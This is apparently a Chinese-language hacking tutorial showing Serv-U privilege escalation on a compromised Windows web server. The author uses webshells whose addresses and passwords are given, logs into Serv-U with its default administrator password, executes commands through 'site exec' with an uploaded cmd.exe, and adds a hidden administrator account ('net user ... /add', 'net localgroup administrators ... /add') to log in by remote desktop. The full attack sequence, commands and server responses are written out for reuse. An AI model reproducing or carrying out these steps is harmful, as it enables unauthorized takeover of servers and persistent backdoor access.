Serv-U提权实例测试演示

admin

Shell：http://www.案例/manage/Databackup/error.asp

Pass：123321111

如图：

看了一下服务器基本信息，得到以下信息：

支持aspx，不支持php，Wscript.Shell不可用

127.0.0.1:21.........关闭

127.0.0.1:1433.........开放

127.0.0.1:3389.........开放

127.0.0.1:43958.........开放

远程桌面可以连接

磁盘目录限制不是很严格，C盘根目录都可以直接浏览，如图：

从上边得到的信息中可以发现，服务器开放1433端口，那么是开放了MSSQL服务的，如果这台服务器的MSSQL存在弱口令，我们也可以利用MSSQLl来提取，但是这里我测试过之后发现，这里的MSSQL不存在弱口令。

服务器也开放了43958端口，这是Serv-U特定会开放的端口，看到这个端口，那就说明服务器上装了Serv-U软件，我们或许可以通过这一点来提权。

对于Serv-U提权来说，aspx的脚本和php的脚本提权的成功率还是蛮高的，asp的提权脚本成功率很低，所以我这里就不用这个asp的web了，我再传一个aspx的shell上去，这个服务器是支持aspx的。

上传完毕的aspx的web的地址是：

http://www.案例/manage/Databackup/drvfan.aspx

密码是：

NI610B

登陆后，直接切换到SU的提权界面：

什么都不用改，直接单击“Exploit”按钮开始执行，回显如图：

在回显中的这么几句：

220 Serv-U FTP Server v6.3 for WinSock ready...

user localadministrator

331 User name okay, need password.

pass #l@$ak#.lk;0@P

230 User logged in, proceed.

可以看到，SU的默认管理密码并没有被修改，我们登陆是成功了的，在后边的这么几句：

220 Serv-U FTP Server v6.3 for WinSock ready...

user bin

331 User name okay, need password.

pass binftp

230 User logged in, proceed.

site exec cmd.exe /c net user

501 Cannot EXEC command line (error=0).

Quit

这里我们的FTP用户是添加成功了的，但是我们执行net user失败了，错误提示是：

Cannot EXEC command line (error=0)

对于这个错误，我觉得应该是因为服务器管理员对cmd.exe做了权限限制，导致我们的web无权调用cmd.exe，进而导致我们这里的命令执行失败。

失败的原因找到了，那么解决办法也就有了。

遇到这种情况，我们可以直接自己传一个cmd.exe上去的，一般我都会传到C:\windows\temp目录下，如图：

这个cmd.exe就是我传上去的。

好了，现在回到SU提权界面，把我们传上去的cmd.exe的路径填上，如图：

其他的都不要动，然后再执行，如图：

看这两句：

site exec c:\windows\temp\cmd.exe /c net user

200 EXEC command successful (TID=33).

可以看到，这次就提示执行成功了。

然后我们把命令改成添加管理员的命令即可，比如这两句：

net user drvfan drv283MLGB!!! /add

net localgroup administrators drvfan /add

如图：

这样直接执行就OK了，执行完毕就在服务器上添加了一个用户名为drvfan，密码为drv283MLGB!!!的管理员，这里的服务器开了3389，直接连上去登陆就行了，如图：

完毕。